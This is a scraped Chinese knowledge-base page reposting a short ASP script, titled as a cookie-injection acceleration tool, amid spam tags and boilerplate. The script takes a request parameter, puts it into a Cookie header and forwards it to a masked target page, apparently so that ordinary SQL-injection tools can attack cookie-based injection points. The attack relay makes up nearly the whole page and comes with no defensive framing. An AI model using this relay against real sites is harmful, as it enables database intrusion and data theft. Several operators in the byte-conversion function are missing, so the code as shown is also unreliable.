主頁 > 知識庫 > ASP版實(shí)現(xiàn)cookies注入加速工具

ASP版實(shí)現(xiàn)cookies注入加速工具

熱門標(biāo)簽:滴滴地圖標(biāo)注上車點(diǎn) 電銷機(jī)器人采購 外呼系統(tǒng)怎么話費(fèi) 硅基電話機(jī)器人加盟 無營業(yè)執(zhí)照地圖標(biāo)注教學(xué) 宿州防封外呼系統(tǒng)平臺 高質(zhì)量的電銷外呼系統(tǒng) 地圖標(biāo)注還可以做嗎 友邦互聯(lián)電銷機(jī)器人違法嗎
來源:職業(yè)欠錢zj1244共用的public Blog


復(fù)制代碼 代碼如下:


Str="xxxid="escape(request("FK")) 
Url="http://xxx.chinaxxx.com/injection.asp" 
response.write PostData(Url,Str) 

Function PostData(PostUrl,PostCok)  
Dim Http 
Set Http = Server.CreateObject("msxml2.serverXMLHTTP") 
With Http 

.Open "GET",PostUrl,False 
.SetRequestHeader "Cookie",PostCok 
.Send 
PostData = .ResponseBody 
End With 
Set Http = Nothing 
PostData =bytes2BSTR(PostData) 
End Function 

Function bytes2BSTR(vIn) 
Dim strReturn 
Dim I, ThisCharCode, NextCharCode 
strReturn = "" 
For I = 1 To LenB(vIn) 
ThisCharCode = AscB(MidB(vIn, I, 1)) 
If ThisCharCode  H80 Then 
strReturn = strReturn  Chr(ThisCharCode) 
Else 
NextCharCode = AscB(MidB(vIn, I + 1, 1)) 
strReturn = strReturn  Chr(CLng(ThisCharCode) * H100 + CInt(NextCharCode)) 
I = I + 1 
End If 
Next 
bytes2BSTR = strReturn 
End Function 

%>

標(biāo)簽:廣元 新余 雅安 宣城 儋州 錫林郭勒盟 七臺河 江門

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《ASP版實(shí)現(xiàn)cookies注入加速工具》,本文關(guān)鍵詞  ASP,版,實(shí)現(xiàn),cookies,注入,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《ASP版實(shí)現(xiàn)cookies注入加速工具》相關(guān)的同類信息!
  • 本頁收集關(guān)于ASP版實(shí)現(xiàn)cookies注入加速工具的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章